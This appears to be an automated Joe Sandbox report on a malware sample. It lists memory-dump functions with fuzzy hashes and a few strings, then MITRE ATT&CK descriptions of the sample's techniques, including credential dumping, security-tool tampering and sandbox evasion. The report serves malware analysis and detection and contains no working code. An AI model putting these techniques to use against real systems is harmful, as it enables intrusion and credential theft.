Source File: 00000000.00000002.1823325244.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID: .$/$/$/$/$:$Hjq
API String ID: 0-1725731365
Opcode ID: 28e00c312eb1140176b91fa9c36314901424ebc490da504621903a1e612cee4e
Instruction ID: b0e1f561a4593cdfbea1931303ad652b927d47546d0c2e95aa39832959294d20
Opcode Fuzzy Hash: 28e00c312eb1140176b91fa9c36314901424ebc490da504621903a1e612cee4e
Instruction Fuzzy Hash: 51A1E374E01318CFDB28DFB5D8546EDBBB2BF89304F20806AD519AB255DB359982CF50

Function 04E03840 Relevance: 2.4, Strings: 1, Instructions: 1109COMMON

Download Yara Rule

Strings

-, xrefs: 04E03AC6

Memory Dump Source

Source File: 00000000.00000002.1823382864.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: dcded94d57e4afb3555efe21497efb1cd2440db081846997a3384c0d2e5635e4
Instruction ID: 4f0fdbee44cc21ee5ee21be23f2ba5310de3dbba0cf580c56fcd93b765f3fb01
Opcode Fuzzy Hash: dcded94d57e4afb3555efe21497efb1cd2440db081846997a3384c0d2e5635e4
Instruction Fuzzy Hash: 12C2B475E0026A8FDB20DB58C984BEEBBB1BB49305F1595E5D828A7346C734AAC1CF50

Function 00E2C4A8 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

0oIp, xrefs: 00E2C690

Memory Dump Source

Source File: 00000000.00000002.1815163637.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID: 0oIp
API String ID: 0-3814338256
Opcode ID: 65c5fc854616ba2ebd0752d0af6099ceb012b0aea7401efce25c5ad55c30faf5
Instruction ID: acbfc7095611fe28b9daacea023f4d97fd8e254386792bfc72da6dd786d3bca3
Opcode Fuzzy Hash: 65c5fc854616ba2ebd0752d0af6099ceb012b0aea7401efce25c5ad55c30faf5
Instruction Fuzzy Hash: 1CB1C774E00218CFDB54DFA9D984A9DFBF2BF89304F2491AAD409AB355DB30A985CF50

Function 04E03001 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

Tefq, xrefs: 04E03178

Memory Dump Source

Source File: 00000000.00000002.1823382864.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID: Tefq
API String ID: 0-1066582953
Opcode ID: d3d5189ff2b30dd9d4c7ce203c182b472fe89885b3a4f491e639e5ed163d14e1
Instruction ID: 1c07faf87b99e383ad89756538139ad1299597b825c000e3a8d813809be16b03
Opcode Fuzzy Hash: d3d5189ff2b30dd9d4c7ce203c182b472fe89885b3a4f491e639e5ed163d14e1
Instruction Fuzzy Hash: B751A8B0D01229CBEB24CFA6C95879EBBB2BF84304F14D5A9C4097B294DB751985CF50

Function 04DF67B8 Relevance: .7, Instructions: 719COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823325244.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c3050cf8caa143981a665301ea2740aaa3255da773524665efe36146622a19c
Instruction ID: 14785fa449ddca6a394d2bab0ab341598b15e8e72146013a871d97edad84a82b
Opcode Fuzzy Hash: 9c3050cf8caa143981a665301ea2740aaa3255da773524665efe36146622a19c
Instruction Fuzzy Hash: DB72E370D00269CFDB25DFA9C984ADEFBB1BF49304F1481E9D548AB255DB31AA81CF50

Function 04DF67A8 Relevance: .6, Instructions: 640COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823325244.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c87476da6146f734d4d42ff2d5e0fbc7924dcc4da1f20eee181f41e8d06ab690
Instruction ID: b6b5002cbdf8a03589c59e7f4893eaaf3ee75edf3de7edf21a5653b5948ee2b3
Opcode Fuzzy Hash: c87476da6146f734d4d42ff2d5e0fbc7924dcc4da1f20eee181f41e8d06ab690
Instruction Fuzzy Hash: 0162F370D002698FDB25DFA8C994BEEFBB1BF49304F1481A9D549BB251DB31AA81CF50

Function 04E04F08 Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823382864.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a2d521d8e9a4f7913ba4af8de573bd3d5eddc8fc9d6b6533f14ddb66f22de1b
Instruction ID: 0522b57d33453439ee48172efe68ede346b23e3ef1cddc45d526b38a978c41fb
Opcode Fuzzy Hash: 3a2d521d8e9a4f7913ba4af8de573bd3d5eddc8fc9d6b6533f14ddb66f22de1b
Instruction Fuzzy Hash: 1542C775E002199FDB14CFA8C980BEEBBF2BB49305F24D5A5D819A7245C735AE81CF60

Function 04DFDC20 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823325244.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0cb05e2454a9e065147727898af6551a2a0e0e7837cf556e459d3b753cebdc2
Instruction ID: f33cfd57d180acbcbf653d4790f5e2e87369fadc94f41475de71f29391e277f3
Opcode Fuzzy Hash: a0cb05e2454a9e065147727898af6551a2a0e0e7837cf556e459d3b753cebdc2
Instruction Fuzzy Hash: 8122C574E042198FCB24CFA9C5809AEFBF2BF48304F259655D855AB356C734E982CFA0

Function 04DFF698 Relevance: .4, Instructions: 418COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823325244.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f267eeba191c376166e6a6ee193b91e609e173aaf4bdb95f92f6cfbe2c1a71
Instruction ID: 2cab676979f35fec39d97fa4298ed54bf6b0c10434cd1430eb2352710dd2365e
Opcode Fuzzy Hash: 08f267eeba191c376166e6a6ee193b91e609e173aaf4bdb95f92f6cfbe2c1a71
Instruction Fuzzy Hash: 4212C175D00219CFCB24CFA9C584AAEFBF2FF48300F25955AD448AB256D735A986CF90

Function 04C75930 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823060216.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 895c5f538f9db97631a43bf5fd062610d20e8aa82f3a88caec34d7bc5d125c2e
Instruction ID: fa9547e0622444354b879dfe7b861311b754a337e265821644dab0562b61b476
Opcode Fuzzy Hash: 895c5f538f9db97631a43bf5fd062610d20e8aa82f3a88caec34d7bc5d125c2e
Instruction Fuzzy Hash: 491290B042374D8AE311CF65E95E18D3FB1BBA171CB906209E2622F2E5DFB4155ACF48

Function 04E04EF8 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823382864.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6acd4e490bba0787b358389142eb4a2efbf3fcf32e4c7c30c16a75bf411ba87d
Instruction ID: d7f325285662d2d4fc5488faf16f575142c19fbe8f2fad9409fc1daf82843ee6
Opcode Fuzzy Hash: 6acd4e490bba0787b358389142eb4a2efbf3fcf32e4c7c30c16a75bf411ba87d
Instruction Fuzzy Hash: 64C1E074D002589FDB14CFA9C9847EEBBF2BF48304F14D5AAD819A7291D734AA85CF60

Function 04C7C148 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823060216.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a90ac1d85e052c359591a455d6803f10d8f489c4a61fc65263139de094a9e3c
Instruction ID: 865c869ecab6ec45def8a348b0da28a8d2b08b73e05648739aa7afcfdc74fa15
Opcode Fuzzy Hash: 0a90ac1d85e052c359591a455d6803f10d8f489c4a61fc65263139de094a9e3c
Instruction Fuzzy Hash: 0FD10534C2175ACACB11EB64D9916ADB771FF95300F60979AE0097B225FF706AC4CB82

Function 00E287D0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1815163637.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5742cadada6d7782d463ad787efe986932cabd945e03741d55e53832bc7a931d
Instruction ID: bfd59bea6b00d5b85b97dccbcda5e8ad9dda79668e1fbf0310dbf7e6c8882f4a
Opcode Fuzzy Hash: 5742cadada6d7782d463ad787efe986932cabd945e03741d55e53832bc7a931d
Instruction Fuzzy Hash: FBD1CE74D01228CFDB24DFA9D984B9DBBB2FF89300F2495AAD409B7255DB309A85CF50

Function 04C7C158 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823060216.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b4b2f1c88414c9e0342a72e75b9af53285b3534d4c477edd7fff8f79e0c52d
Instruction ID: 5302d44ad90ca0fb2261d65142aa5f3e56c16ce88ed58a66ce25a0d6041ee03f
Opcode Fuzzy Hash: c2b4b2f1c88414c9e0342a72e75b9af53285b3534d4c477edd7fff8f79e0c52d
Instruction Fuzzy Hash: BBD1F434C2175ACACB11EB64D9916ADB771FF95300F60979AE0097B215FF706AC4CB82

Function 04E00040 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823382864.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99380bfd0fd6944254e2c7ca8db93425d9f3ef4d3133dfb2845e15d2bf50e9de
Instruction ID: b91f88ec001662e69fd8786c9b8eb434a4a6717d1081856943cac331772ef47a
Opcode Fuzzy Hash: 99380bfd0fd6944254e2c7ca8db93425d9f3ef4d3133dfb2845e15d2bf50e9de
Instruction Fuzzy Hash: 59B1D171D00219CFDB04CF99D584BEEBBF2BF48305F24E165D418AB295D338AA85CB54

Function 04E04BC0 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823382864.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab3210886d161a729ebd86da720ac7d6758e1b6f8ec6a9c66b87d9ed7a282f9
Instruction ID: 2baf29642f3ac5dc029230a5d2fd80379bd2493a72156477079a6f5ca20e9b67
Opcode Fuzzy Hash: 7ab3210886d161a729ebd86da720ac7d6758e1b6f8ec6a9c66b87d9ed7a282f9
Instruction Fuzzy Hash: FEB1D271D012499FDF04CFE9CA84AAEFBB2BF48304F20D429E515BA264CB355A46DF61

Function 04E04BB1 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823382864.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9987156e64a01fcbb4429928e754f9a9c7c622ff881424efeebd8a07eec6a04
Instruction ID: a931617c135e9cc3e15e69de6586d4cb4416d796c5180c5e7c5b2748c5e741f3
Opcode Fuzzy Hash: f9987156e64a01fcbb4429928e754f9a9c7c622ff881424efeebd8a07eec6a04
Instruction Fuzzy Hash: 7DB1F371D012499FDF04CFE8CA84AAEBBB2BF48300F20D429E515BB264CB355A56DF61

Function 04E00640 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823382864.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab993adae4d18bca1cae0583c4b2c9dd0da66d1a88303fc9c8318036952d40da
Instruction ID: ab09f80f21d25362aedf19d1eaa52a807b6b8b03da946b0d92d799acc05a7ba6
Opcode Fuzzy Hash: ab993adae4d18bca1cae0583c4b2c9dd0da66d1a88303fc9c8318036952d40da
Instruction Fuzzy Hash: DDA13370D01218CFDB04CFA9D488BEEBBB2BF49315F24A129D424B7291D7789A85CF54

Function 04C7FA58 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823060216.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e649e0f355bbdb6cf44cc8e826d3230c046f25e95731adc9b5325f3936933e49
Instruction ID: 50116abfd54f9f543f44affe3c3e78fa20fd7fddd4eeff544c82f6a870e91725
Opcode Fuzzy Hash: e649e0f355bbdb6cf44cc8e826d3230c046f25e95731adc9b5325f3936933e49
Instruction Fuzzy Hash: 9F916F70E00209DFDF10CFA9D9917ADBBF2BF88314F14852DE815AB294EB74A945CB91

Function 04DFDC10 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823325244.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad860c769c1f94cdfaa613768322da8f0efdbdde3fdd54148c1c75fd33091941
Instruction ID: c02032d27806b2dd460587a24807e6b2a31b55487612f061de9d8a505f3c599d
Opcode Fuzzy Hash: ad860c769c1f94cdfaa613768322da8f0efdbdde3fdd54148c1c75fd33091941
Instruction Fuzzy Hash: 88B18574D00219CFCB24CFA9C984ADEFBF2BF48304F258669D455AB256D734A981CF90

Function 04C75920 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823060216.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7f5b36ecf3952fb364e3872919689679baa07b51c505f5a8694b071b739a664
Instruction ID: 8a4b5d76bb384ae698b18ad431229c00429cac8a9eced3fb1223d08d3903345e
Opcode Fuzzy Hash: a7f5b36ecf3952fb364e3872919689679baa07b51c505f5a8694b071b739a664
Instruction Fuzzy Hash: 39C115B082374D8BD711CF65E95A18D7FB1BBA171CB606209E2622F2E5DFB4144ACF48

Function 00E2CEE0 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1815163637.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d2dc1ac9fedcfd706cc7cd9afa773c9a140bb6f5577f99cc35b8ec0a89f2b20
Instruction ID: 42d1c4cf6f634e21c6aa1a9baa18e1e0bebe1d53d7d0173cb19c7f52194dcee1
Opcode Fuzzy Hash: 5d2dc1ac9fedcfd706cc7cd9afa773c9a140bb6f5577f99cc35b8ec0a89f2b20
Instruction Fuzzy Hash: 9E91E574D05218CFDB14DFAAD98469DFBF2BF89300F209169D409AB369DB349982CF50

Function 04E009C8 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823382864.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 497398c91e18e2d92452c93166dbeb873cce0a395ecb659058434426a70a2ac1
Instruction ID: 2e0e6111ec53922e6c8c3c370b6bd4815dc543529a03b55417ea65d0770761cc
Opcode Fuzzy Hash: 497398c91e18e2d92452c93166dbeb873cce0a395ecb659058434426a70a2ac1
Instruction Fuzzy Hash: 37811674D022199FDB00DFA9D580AAEFBF2BF88304F24E565D814A7295C734AA81CF94

Function 00E2C052 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1815163637.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f1052b90988b245709543fb9dbd4e8931bb078ae8d814288a8eb0870c95e89c
Instruction ID: 19da504fa7846196b549688e7b4d71923e72314fb2ab322a8cfe592ffbe09521
Opcode Fuzzy Hash: 1f1052b90988b245709543fb9dbd4e8931bb078ae8d814288a8eb0870c95e89c
Instruction Fuzzy Hash: 7781C374D01219CFDB14DFA9D9846DEBBF2BF89300F249169D409AB269DB309982CF50

Function 04DF0007 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823325244.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3640cdaa4112a13bdf01aef2bdd9fb53f248418526fca39a6eb25f7cb3d0bed7
Instruction ID: e4d22cfaafc3ddde9402bfcd6e1efb1a5cd2247c3726d1915b4ab7d70e8b5c4b
Opcode Fuzzy Hash: 3640cdaa4112a13bdf01aef2bdd9fb53f248418526fca39a6eb25f7cb3d0bed7
Instruction Fuzzy Hash: 9861E374D052688FEB25CF6AC854BDABBB2BF89300F04C0EAD458A7256D7745A85CF50

Function 04E05D50 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823382864.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e97d51f1be77b2a0a55e22b40d559f529085f44985c5890f27590abf8fdac9b
Instruction ID: bb9f4dac4cb77a8aa9ec392afeac8ff6f4403c33f042c3b68afb0c4ba29ea78f
Opcode Fuzzy Hash: 9e97d51f1be77b2a0a55e22b40d559f529085f44985c5890f27590abf8fdac9b
Instruction Fuzzy Hash: C9312631E15208DFCB04CFA9D448AEDBBB1FF8A315F15A46AD415B72A1DB749884CF18

Function 00E2CED0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1815163637.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1afb05e92280449502ba8d9b1e23f79ca7b74cdde4f09a37e75e9c17a5bbdc68
Instruction ID: 7d26f403ba1883aaebe0a77c721166aca6652cade0666bd48c767ebe537ccb99
Opcode Fuzzy Hash: 1afb05e92280449502ba8d9b1e23f79ca7b74cdde4f09a37e75e9c17a5bbdc68
Instruction Fuzzy Hash: 2331C871D056188BDB18CFABD9406DEFBF7AFC9300F14D169C418AB265EB3159468F40

Function 00E287C0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1815163637.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ace38a67061af61392bf557dbd63b2cdfda0f3b0592608cba14a0fbd5783379f
Instruction ID: 2d7bec72b44989db1f2a37273f740c6feade7666238c6cfcf00fbd00ee762bbb
Opcode Fuzzy Hash: ace38a67061af61392bf557dbd63b2cdfda0f3b0592608cba14a0fbd5783379f
Instruction Fuzzy Hash: BF319271D016288BEB28CFAAD9447DEBBF2BF88304F14C16AD508A7255EB750985CF54

Function 00E219C0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1815163637.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddda88f2d06b407b9e6fd7854d4f79517d1328d75e20257bcbdf88f8980edb12
Instruction ID: 7735d2fceeb1d9cf46d80a26148564a48e81801feb44228b44e0d9f72ddeee10
Opcode Fuzzy Hash: ddda88f2d06b407b9e6fd7854d4f79517d1328d75e20257bcbdf88f8980edb12
Instruction Fuzzy Hash: 2A113371E466408FE30ECF6BAD081127BE3BBC5204709E17A880C8A23DDF718595CF54

Function 00E219D0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1815163637.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9669b3137e73943cd152311552c7c1e80d917b9a89e5f4a32df57b099340f66
Instruction ID: ffb77aadbfebd579e2813cd38a01eb6ed95e901debdebf10367756212a1760c8
Opcode Fuzzy Hash: a9669b3137e73943cd152311552c7c1e80d917b9a89e5f4a32df57b099340f66
Instruction Fuzzy Hash: 0001B5B1E46A108BA31ECF6BBD48512BAE7BBC4304759E17A880C4A23CEF7181D5DE54

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

